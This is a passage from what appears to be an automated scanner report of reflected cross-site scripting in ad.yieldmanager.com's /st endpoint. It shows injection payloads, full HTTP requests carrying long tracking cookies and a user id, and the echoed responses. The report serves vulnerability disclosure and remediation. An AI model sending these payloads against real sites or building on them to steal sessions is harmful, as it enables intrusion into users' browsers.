   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.32. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b090d"><script>alert(1)</script>b3e751e2978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=806254&b090d"><script>alert(1)</script>b3e751e2978=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k
!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wj]!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*<57!!!#G!$1dF!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=*/]]!!!#G!#dUS!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!$,m-!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!#avR!,x.^!%)<k!/pW_!%M#r!#a.3!!5/$*ERU>!w1K*!(#l)!%C9A!'UVr~~~~~=)nJc=*!G4!!!#G!$0Tm!,x.^!%)<k!30M5!%vao!(-EV!?5%!*ERU=!w1K*!(#l)!%JKf!(3U?~~~~~=)nNM=.*8W!!.vL!$.w1!,x.^!%)<k!2jZq!%v%0!4)>p!!H<'*ERU?!w1K*!(#l)!%C9A!(2_Z~~~~~=)n`L=*/XG!!!#G!$,b^!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=)nl!!!.vL!$1dE!,x.^!%)<k
!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=)no>!!.vL"; ih="b!!!#<!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!+[=I!!!!#=)n6E!+[>D!!!!#=)n4%!,+Yc!!!!)=)n0b!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!(=)o3I!.g%_!!!!%=)nrD!.g(s!!!!,=)o.b!.g(t!!!!%=)nv0!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/2Gk!!!!#=)nhw!/4Kq!!!!#=)nPm!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!/pW_!!!!$=)nJc!/peY!!!!#=)n-H!/pi4!!!!#=)nN$!/pid!!!!#=)nPE!/wxM!!!!$=)n(a!08vf!!!!$=)nFv!0Ehb!!!!#=)n,v!0Q8#!!!!#=)mx$!0Q[/!!!!#=)n?I!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!$=)n>t!0v*F!!!!#=)nLX!0w#]!!!!#=)n@k!1#Gq!!!!$=)n+(!1#HS!!!!#=)n7A!1#HT!!!!#=)n7j!1-6r!!!!$=)nAe!1@m6!!!!$=%3V#!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1YRS!!!!$=)n'g!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!>=)nf-!1_f$!!!!'=)n@C!1_f'!!!!)=)n=Q!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1kL!!!!!$=)n3*!1qGe!!!!#=%1p'!1sCA!!!!#=)nK_!1wmg!!!!#=)![j!2*$P!!!!#=)n)2!2*,b!!!!#=(h4W!2-Vw!!!!$=)nQ@!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!21R/!!!!#=)n`u!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2Cr6!!!!$=)naG!2KhY!!!!$=)ncg!2Khp!!!!#=)nbB!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2NGs!!!!#=)n>K!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2Z9v!!!!$=)ne[!2`+,!!!!#='hw!!2g$h!!!!$=)nL.!2g$l!!!!$=)nRd!2g'^!!!!#=)ng*!2g>n!!!!$=)n,#!2gH2!!!!#='i#o!2jZq!!!!%=)n`L!2jZv!!!!$=)nVx!2j[4!!!!%=)nYA!2j[6!!!!$=)nU+!2j[@!!!!#=)n[a!2j[B!!!!#=)nUT!2jg(!!!!$=)n^V!2l9<!!!!$=)nIg!2l>@!!!!#=(aKS!2t,W!!!!$=)nF#!3!Yk!!!!$=)n*.!3$a2!!!!#=)5nT!3$vo!!!!#=)nc>!3$yw!!!!$=)n_Q!3'oN!!!!+=)nGr!3/P1!!!!#=)ndb!30M5!!!!#=)nNM!349Y!!!!#=)m[Z!34t)!!!!$=)nGH!35`n!!!!#=)nHC!36PE!!!!$=)n=x"; uid=uid=8a044d34-ad47-11e0-98d7-9bec9b275be2&_hmacv=1&_salt=1095483093&_keyid=k1&_hmac=e9bfd70fd4e5afb89d366b3b6b929ea9a1f33983; 
bh="b!!!%1!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#
='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,
!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:49:23 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 23 Jul 2011 13:49:23 GMT
Pragma: no-cache
Content-Length: 4721
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=728x90&b090d"><script>alert(1)</script>b3e751e2978=1&s=806254&_salt=2506030954&t=2" target="_parent">
...[SNIP]...

3.33. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8994d"-alert(1)-"ce7be5c493 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=806254&8994d"-alert(1)-"ce7be5c493=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k
!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*